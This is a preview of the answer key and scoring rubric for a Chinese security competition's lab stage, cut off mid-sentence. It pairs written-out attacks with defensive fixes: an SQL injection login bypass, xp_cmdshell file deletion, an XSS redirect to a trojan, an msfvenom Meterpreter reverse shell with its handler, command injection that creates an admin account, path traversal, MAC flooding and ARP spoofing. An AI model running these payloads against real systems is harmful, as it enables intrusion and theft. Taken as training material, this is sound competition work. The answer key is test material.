信息安全管理与评估赛项赛题与评分标准-第二阶段答案及评分标准_第1页
信息安全管理与评估赛项赛题与评分标准-第二阶段答案及评分标准_第2页
信息安全管理与评估赛项赛题与评分标准-第二阶段答案及评分标准_第3页
信息安全管理与评估赛项赛题与评分标准-第二阶段答案及评分标准_第4页
信息安全管理与评估赛项赛题与评分标准-第二阶段答案及评分标准_第5页
已阅读5页,还剩42页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

任务1:SQL注入攻防(55分)Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:<title>LoginPage</title>找到提交的变量名(3分)提供以下变量:name="usernm"name="passwd"对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分)构造注入语句:username:任意用户名password:含:orX=’X(X为任意值)(3分)同时包含截图:1、通过任意用户名登录(截图)2、登录成功页面(截图)(2分)进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分)(10分)包含语句:1、selectpasswordfromuserswhereusername=’$username’2、if($obj->password==$password)再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并将验证过程截图;(5分)同时包含截图:1、通过任意用户名登录(截图)2、登陆后,页面出现用户名不存在提示;(截图)(5分)Web继续访问DCST中的WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)找到的源程序含有页面标题:<title>Query</title>找到提交的变量名(3分)name="usernm"对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分)(2分)输入“%”,返回所有用户信息(截图)输入“_”,返回所有用户信息(截图)(3分)通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:\目录下的1.txt文档,并将注入代码及测试过程截图;(5分)构造注入语句:‘execmaster.dbo.xp_cmdshell‘delc:\1.txt’--(5分)进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分)截图:在服务器场景QueryCtrl.php源程序语句:$keyWord=$_REQUEST[‘usernm’]之后加入:(10分)再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。(5分)通过:‘execmaster.dbo.xp_cmdshell‘delc:\1.txt’—再次进行SQL注入截图;系统出现错误提示:BadKeyWord!(截图)(5分)任务2:XSS和CSRF攻防(65分)Web访问DCST中的WebServ2003服务器,"/"->"EmployeeMessageBoard",分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)含有页面标题:<title>MessageBoard</title>找到提交的变量名:(3分)name="MessageUsername"name="message"对该任务题目1页面注入点进行XSS渗透测试,并进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)构造注入代码:(2分)<script>while(1){alert("Hacker!");};</script>测试注入成功:(3分)弹出alert("Hacker!")括号中的消息;对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(/)中的木马程序:/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)构造注入代码:(2分)<script>location.href="/TrojanHorse.exe";</script>测试过程:(3分)名称:trojanhorse.exe发送者:通过IIS搭建网站(/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(/)的WWW根目录下,并将搭建该网站结果截图;(5分)搭建IIS(1分)Internet信息服务:网站目录下存放:trojanhorse.exe搭建DNS(1分)正向查找区域:主机(截图)Zone:Org主机:hackerMetasploitFramework:TrojanHorse.exe生成(3分)root@bt:~#Ifconfig(截图)显示KaliIP地址:X.X.X.X截图包含:root@bt:~#msfvenom–pwindows/meterpreter/reverse_tcpLHOST=X.X.X.XLPORT=80–fexe–otrojanhorse.exe当"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(/)中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)MetasploitFramework:HackerReverseTcp连接客户端(2分)root@bt:~#msfconsolemsf>useexploit/multi/handlermsfexploit(handler)>setPAYLOADwindows/meterpreter/reverse_tcpPAYLOAD=>windows/meterpreter/reverse_tcpmsfexploit(handler)>setLHOSTX.X.X.XLHOST=>X.X.X.Xmsfexploit(handler)>setLPORT80LPORT=>80msfexploit(handler)>exploit[*]StartedreversehandleronX.X.X.X:80[*]Startingthepayloadhandler...(截图中包含黄色部分)访问者主机需要被Kali主机远程控制(3分)KaliMSF提示(截图)包含如下信息KaliIP:X.X.X.X访问者主机IP:Y.Y.Y.Y[*]Sendingstage(……bytes)toY.Y.Y.Y[*]Meterpretersession1opened(X.X.X.X:Port1->Y.Y.Y.Y:Port2)at……meterpreter>Kali截图包含打开访问者主机的CMD.exe命令行窗口;进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分)(10分)在服务器场景原insert.php程序语句$info=$_REQUEST[‘message’]后加入:绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分;$info=str_replace(“<”,”(”,$info);$info=str_replace(“>”,”)”,$info);或$info=str_replace(“<”,”{”,$info);$info=str_replace(“>”,”}”,$info);或$info=str_replace(“<”,”[”,$info);$info=str_replace(“>”,”]”,$info);再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)SQLServer企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时CommunicationMessage页面显示Content:注入语句符号“<”和“>”被替换为上一题替换后的字符;(5分)Web访问DCST中的WebServ2003服务器,"/"->"ShoppingHall",分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题为:<h1>ShoppingHall</h1>找到提交的变量名:(3分)goods=keyboard&quantity=1goods=mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods=memory&quantity=1goods=dvdrom&quantity=1对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看"/"->"PurchasedGoods.php页面,并将注入代码及测试过程截图;(5分)构造注入代码:(2分)<script>document.location="http://X.X.X.X/ShoppingProcess.php?goods=cpu&quantity=999999";</script>WebServerIP:X.X.X.X测试过程:(3分)截图:Goods:CPU数值大于或等于999999进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF渗透测试,并将修改后的源程序截图;(10分)截图:服务器场景DisplayMessage.php程序语句:echo“Content:”.”$obj->info”.”……”替换为:echo“Content:”.strip_tags(”$obj->info”).”……”(10分)再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效,并将验证过程截图;(5分)(5分)得分点:直接显示代码信息,而不是将代码执行;(截图)SQLServer企业管理器中,Message表中info字段注入语句含有标记<script></script>;同时CommunicationMessage页面显示Content:注入语句不含有标记<script></script>;任务3:命令注入与文件包含攻防(50分)Web访问DCST中的WebServ2003服务器,"/"->"DisplayDirectory",分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:<title>DisplayC:\’sDirectory</title>找到提交的变量名:(3分)name="directory"对该任务题目1页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:\Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码及测试过程截图;(5分)注入语句:(2分)WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add测试成功:(3分)截图:含有:命令成功完成。进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御命令注入渗透测试,并将修改后的源程序截图;(10分)(10分)包含语句:$str=’|’if(strstr($directory,$str)==false)再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效,并将验证过程截图;(5分)截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;含有本任务第2题的命令注入语句;WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add截图2:页面出现非法输入提示;含有本任务题目3修改后代码中的错误提示信息;本案例提示信息为:illegalinput!(5分)Web访问DCST中的WebServ2003服务器,"/"->"DisplayUploaded'sFileContent",分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)页面标题:<title>DisplayUpload’sFileContent</title>找到提交的变量名:(3分)name="filename"对该任务题目5页面注入点进行渗透测试,使页面DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件:AppServ/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;(5分)构造注入代码:(2分)..\..\..\AppServ\Apache2.2\logs\access.log回显DCST中的WebServ2003服务器访问日志文件:显示出AppServ/Apache2.2/logs/access.log的内容:(3分)InternetExplorer地址栏中须含有:DisplayFileCtrl.php?filename=进入DCST中的WebServ2003服务器的C:\AppServ\www目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;(10分)(10分)包含语句:$str=’..’if(strstr($directory,$str)==false)再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效,并将验证过程截图。(5分)截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;输入框含有本任务题目6的注入代码:..\..\..\AppServ\Apache2.2\logs\access.log截图2:页面出现非法输入提示;含有本任务题目7修改后代码中的错误提示信息;本案例提示信息为:illegalinput!(5分)任务4:数据窃取防护:二层攻防(45分)将PC1、Kali所连接端口划入与WAF同一VLAN(VLAN10),并将PC1、Kali分配与DCST服务器相同网段IP地址,使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段(VLAN10)内相互Ping通。(2分)截图:PC1、Kali、DCST同在VLAN10;(#showvlan)VLAN10中包含的接口数>=3;WebServerIP配置(与参数表中服务器场景的IP地址一致):PC1IP地址配置(与参数表中PC1的IP地址一致):PC3IP地址配置(与参数表中PC3的IP地址一致):三个终端之间能够相互Ping通;在同一个窗口ping通除了本机外的2个IP地址;查看DCRS交换机VLAN10的MAC地址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图。(3分)#showmac-address-tablecountvlan10DCRS地址表空间中有可用的空间;当前地址表记录数少于地址表容量;Maxentires……Total……:16384Currententires……Total……:该数值小于10从Kali发起MACFlooding渗透测试,使DCRS交换机的MAC地址表溢出,使其在MAC地址表溢出的条件下,无法学习到PC1和DCST中的WebServ2003服务器的MAC地址表信息,查看DCRS交换机的MAC地址表信息,并将渗透测试过程截图。(5分)Kali#macof(2分)#showmac-address-tablecountvlan10当前地址表记录数等于地址表容量;Maxentires……Total……:16384Currententires……Total……:该数值=16384(3分)Kali打开wireshark,验证在DCRS交换机MAC地址表溢出的条件下,可以监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将该验证过程截图。(5分)PC1通过InternetExplorer访问;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/……Kali打开wireshark,监听到PC1通过InternetExplorer访问DCST服务器场景的HTTP流量;截图:Source:PC1的IP地址(与参数表一致)Destination:服务器场景的IP地址(与参数表一致)Protocol:HTTP(5分)在DCRS交换机Kali所连接端口配置PortSecurity特性,阻止Kali发起MACFlooding渗透测试,验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址,并将DCRS交换机相关配置信息以及验证信息截图。(8分)配置截图包含:mac-address-learningcpu-control(2分)在VLAN10每个接口全部启用如下:InterfaceEthernet1/0/Xswitchportport-security(2分)#clearmac-address-tabledynamic(2分)#showmac-address-tablecountvlan10DCRS地址表空间中有可用的空间;当前地址表记录数少于地址表容量;Maxentires……Total……:16384Currententires……Total……:该数值小于10(2分)在DCRS交换机配置PortSecurity特性的条件下,Kali再次打开wireshark,监听PC1访问DCST中的WebServ2003服务器流量,验证此时Kali无法监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将验证过程截图。(7分)PC1通过InternetExplorer访问服务器场景;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/……Kali打开wireshark,监听不到PC1通过InternetExplorer访问DCST的HTTP流量;(截图)Filter:http显示报文数:空任务5:数据窃取防护:ARP攻防(45分)在PC1访问DCST中的WebServ2003服务器时,查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将PC1和DCST中的WebServ2003服务器的ARP缓存信息截图。(5分)PC1、WebServ2003Ipconfig/all分别显示PC1、WebServ2003的IP和MAC;PC1的IP和MAC:服务器场景的IP和MAC:PC1通过InternetExplorer访问服务器场景;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/……PC1:ARP表项内容为WebServ2003的IP->WebServ2003的真实的MAC;WebServ2003:ARP表项内容为PC1的IP->PC1的真实的MAC;在Kali对PC1进行ARPSpoofing渗透测试,使PC1无法访问DCST中的WebServ2003服务器,PC1的ARP缓存为:DCST中的WebServ2003服务器IP->Kali的MAC地址,在PC1查看被Kali毒化后的ARP缓存信息,并将该信息截图。(5分)Kali:#arpspoof–tPC1_IPWebServ2003_IP(过程截图)(2分)PC1:ARP表项内容为WebServ2003的IP->Kali的MAC;KaliMAC:ifconfig(截图)(3分)在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试,使Kali能够使用wireshark监听到PC1向DCST中的WebServ2003服务器的LoginAuth.php页面提交的登录网站用户名、密码参数,并将该渗透测试过程截图。(7分)Kali:#arpspoof–tPC1_IPWebServ2003_IP#arpspoof–tWebServ2003_IPPC1_IP#echo1>/proc/sys/net/ipv4/ip_forward(3分)PC1通过InternetExplorer访问服务器场景;(截图)地址栏包含:服务器场景IP(匹配参数表服务器场景IP)/success.phpKali打开wireshark,监听到PC1通过InternetExplorer访问DCST服务器场景的HTTP流量;(截图)截图中包含PC1通过InternetExplorer访问DCST服务器场景的用户名、密码;包含:usernm=XXX&passwd=XXX(4分)在DCRS交换机上配置AccessManagement特性阻止Kali发起ARPSpoofing渗透测试,并将DCRS交换机该配置信息截图。(5分)配置截图包含:amenable(2分)只在连接Kali的接口配置:InterfaceEthernet1/0/Xamportammac-ip-poolMac(Kali)IP(Kali)(3分)在DCRS交换机上配置AccessManagement特性的条件下,再次在Kali对PC1和DCST中的WebServ2003服务器进行ARPSpoofing渗透测试,此时DCRS交换机的AccessManagement特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARPSpoofing渗透测试,再次查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将该信息截图。(8分)(4分)PC1:ARP表项内容为WebServ2003的IP->WebServ2003的真实的MAC;(4分)WebServ2003:ARP表项内容为PC1的IP->PC1的真实的MAC;在DCRS交换机上删除AccessManagement技术配置,通过IPDHCPSnoopingBind特性来阻止Kali发起ARPSpoofing渗透测试,并将DCRS交换机相关配置信息截图。(7分)配置截图包含:ipdhcpsnoopingenable(1分)ipdhcpsnoopingvlan10(1分)ipdhcpsnoopingbindingenable(1分)ipdhcpsnoopingbindinguserMac(Kali)addressIP(Kali)vlan10interfaceEthernet1/0/X(Kali连接的接口)(2分)在Kali连接的接口配置:InterfaceEthernet1/0/Xipdhcpsnoopingbindinguser-control(2分)在DCRS交换机上配置IPDHCPSnoopingBind特性的条件下,再次在Kali对PC1和DCST中的WebServ2003服务器进行ARPSpoofing渗透测试,此时DCRS交换机的IPDHCPSnoopingBind特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARPSpoofing渗透测试,再次查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将该信息截图。(8分)(4分)PC1:ARP表项内容为WebServ2003的IP->WebServ2003的真实的MAC;(4分)WebServ2003:ARP表项内容为PC1的IP->PC1的真实的MAC;任务6:数据窃取防护:生成树攻防(40分)在DCRS交换机开启生成树协议,生成树协议模式为STP,DCRS交换机优先级为0,防止网络出现物理环路,显示DCRS交换机生成树协议的状态,并将该信息截屏;(5分)STP配置:(2分)配置截图包含:spanning-treespanning-treemodestpspanning-treemst0priority0显示DCRS交换机生成树协议的状态:(3分)#showspanning-treeRootID:thisSwitch(必须)在Kali向DCR

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论